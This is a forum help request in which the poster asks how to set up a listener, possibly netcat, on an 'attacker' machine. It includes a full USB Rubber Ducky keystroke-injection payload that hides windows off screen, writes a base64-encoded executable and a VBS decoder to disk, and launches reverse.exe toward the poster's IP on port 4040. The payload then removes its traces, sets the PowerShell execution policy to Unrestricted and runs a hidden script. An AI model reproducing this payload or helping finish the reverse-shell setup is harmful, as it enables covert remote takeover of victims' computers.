i'm sorry both the attacker and victim machines are windows 64 bit 8.1 pro and the script that was run on the victims machine with the rubber ducky was generated at the ducktoolkit.com as shown below: I think that you do understand my question... how do i listen for/view the victims machine on my attacker machine. do I need to download netcat... does it run in windows... or should i be using KALI linux to run netcat. Thanks for your kind help.
DELAY 750
GUI r
DELAY 750
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 750
ENTER
ALT SPACE
DELAY 750
STRING m
DELAY 750
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
STRING $decoder = 'Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0):outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = CreateObject("Scripting.FileSystemObject"):set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function decodeBase64(base64):dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub writeBytes(file, bytes):Dim binaryStream:Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub'
ENTER
STRING $reverse = 'TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAAAADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAAAAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0AAHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hAWXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAAMAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNqkQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwFEVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtvKhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLpAOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNmMgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/AVXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7shwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzpbMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOYLmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B/7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBkSNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2Vsm0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAAAAxAAADpdL7//wAAAAIAAAAMQAAA'
ENTER
STRING Set-Content -Value $decoder -Path C:\decoder.vbs
ENTER
STRING Set-Content -Value $reverse -Path C:\reverse.txt
ENTER
STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe
ENTER
STRING c:\reverse.exe 22.222.22.222 4040 *************(my host IP 22.222.22.222) (my host port 4040)
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL S
DELAY 750
STRING C:\Windows\config-faa25.ps1
ENTER
DELAY 750
ALT F4
DELAY 750
GUI r
DELAY 750
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 750
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 750
STRING m
DELAY 750
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 750
STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1
ENTER